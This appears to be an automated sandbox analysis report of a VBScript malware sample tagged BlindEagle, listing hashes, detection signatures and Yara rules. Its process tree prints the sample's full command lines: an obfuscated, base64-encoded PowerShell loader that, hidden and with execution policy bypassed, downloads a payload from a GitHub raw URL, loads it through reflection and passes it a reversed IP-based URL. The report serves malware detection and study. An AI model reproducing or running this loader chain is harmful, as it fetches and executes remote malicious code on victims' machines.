Edit tour
Windows
Analysis Report
2THp7fwNQD.vbs
Overview
General Information
Sample name: | 2THp7fwNQD.vbsrenamed because original name is a hash value |
Original sample name: | 2da99963acf87f71dc500922da2a8510fbb87c7f11bd5c165a602fbc7c76b177.vbs |
Analysis ID: | 1523825 |
MD5: | ae530aa8e50d1d20e9d0ec5ba8eaf303 |
SHA1: | 345200f8cc77dd41076b833f762a10de7f856758 |
SHA256: | 2da99963acf87f71dc500922da2a8510fbb87c7f11bd5c165a602fbc7c76b177 |
Tags: | BlindEaglevbsuser-JAMESWT_MHT |
Infos: | |
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 6376 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\2THp7 fwNQD.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 6652 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCdDRW11cm wgJysnPSAn Kyc5NCcrJ2 xodHRwczov JysnL3Jhdy 5naXRodWJ1 cycrJ2VyY2 9udGUnKydu dC4nKydjb2 0vTm8nKydE ZXQnKydlY3 RPbi9OJysn b0RlJysndG VjJysndE8n KyduLycrJ3 JlZnMvaGVh ZHMvbWFpbi 9EZScrJ3Rh aE5vdGgtVi 50eHQ5NGw7 IENFbWJhJy sncycrJ2Un Kyc2NENvbn RlbnQnKycg PSAoJysnTm UnKyd3LU9i JysnamVjdC BTJysneXN0 ZScrJ20uJy snTmV0Jysn LldlYicrJ0 NsaWVudCku RG93bmxvJy snYWQnKydT JysndCcrJ3 JpbmcoQ0Un KydtdXJsKT snKycgQ0Vt JysnYmknKy duJysnYXIn Kyd5Q29udG VudCA9IFtT eXMnKyd0ZW 0uQycrJ29u JysndicrJ2 UnKydyJysn dF06OkZyJy snb21CYScr J3NlNjQnKy dTdCcrJ3Jp bmcoQycrJ0 UnKydtJysn YmFzZTY0Q2 9uJysndGUn KyduJysndC k7IENFbWFz Jysnc2VtYm wnKyd5ICcr Jz0gW1InKy dlZmxlY3Rp bycrJ24uQX NzZW0nKydi bHldOicrJz pMJysnb2Fk KENFbScrJ2 JpbmFyJysn eUMnKydvbn RlJysnbnQp OyBbJysnZC crJ24nKyds JysnaWInKy cuSU8uJysn SG9tJysnZV 06JysnOlZB SShqdTYnKy d0eCcrJ3Qu VFRTU1InKy cvMCcrJzA1 LycrJzcnKy c0MS4wMycr JzEuMjcxJy snLjcwMScr Jy8vJysnOi crJ3B0dGhq dTYsIGp1Nm Rlc2F0aXZh ZG9qdTYsIG p1NmRlc2F0 aXYnKydhJy snZG9qdTYn KycsIGp1Nm QnKydlc2F0 JysnaXZhJy snZG9qdTYs IGp1NlJlZ0 EnKydzbWon Kyd1JysnNi crJywgaicr J3U2anU2LC crJ2p1Nmp1 NicrJyknKS 5SRXBsQWNF KCdDRW0nLC ckJykuUkVw bEFjRSgoW2 NoQVJdMTA2 K1tjaEFSXT ExNytbY2hB Ul01NCksW3 N0UkluR11b Y2hBUl0zNC kuUkVwbEFj RSgnOTRsJy xbc3RSSW5H XVtjaEFSXT M5KSB8ICYo ICRFTnY6Q2 9Nc3BFQ1s0 LDI0LDI1XS 1qT2lOJycp ';$OWjuxd = [system. Text.encod ing]::UTF8 .GetString ([system.C onvert]::F rombase64S tring($cod igo));powe rshell.exe -windowst yle hidden -executio npolicy by pass -NoPr ofile -com mand $OWju xD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 6672 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5048 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "('CEm url '+'= ' +'94'+'lht tps:/'+'/r aw.githubu s'+'ercont e'+'nt.'+' com/No'+'D et'+'ectOn /N'+'oDe'+ 'tec'+'tO' +'n/'+'ref s/heads/ma in/De'+'ta hNoth-V.tx t94l; CEmb a'+'s'+'e' +'64Conten t'+' = ('+ 'Ne'+'w-Ob '+'ject S' +'yste'+'m .'+'Net'+' .Web'+'Cli ent).Downl o'+'ad'+'S '+'t'+'rin g(CE'+'mur l);'+' CEm '+'bi'+'n' +'ar'+'yCo ntent = [S ys'+'tem.C '+'on'+'v' +'e'+'r'+' t]::Fr'+'o mBa'+'se64 '+'St'+'ri ng(C'+'E'+ 'm'+'base6 4Con'+'te' +'n'+'t); CEmas'+'se mbl'+'y '+ '= [R'+'ef lectio'+'n .Assem'+'b ly]:'+':L' +'oad(CEm' +'binar'+' yC'+'onte' +'nt); ['+ 'd'+'n'+'l '+'ib'+'.I O.'+'Hom'+ 'e]:'+':VA I(ju6'+'tx '+'t.TTSSR '+'/0'+'05 /'+'7'+'41 .03'+'1.27 1'+'.701'+ '//'+':'+' ptthju6, j u6desativa doju6, ju6 desativ'+' a'+'doju6' +', ju6d'+ 'esat'+'iv a'+'doju6, ju6RegA'+ 'smj'+'u'+ '6'+', j'+ 'u6ju6,'+' ju6ju6'+') ').REplAcE ('CEm','$' ).REplAcE( ([chAR]106 +[chAR]117 +[chAR]54) ,[stRInG][ chAR]34).R EplAcE('94 l',[stRInG ][chAR]39) | &( $ENv :CoMspEC[4 ,24,25]-jO iN'')" MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |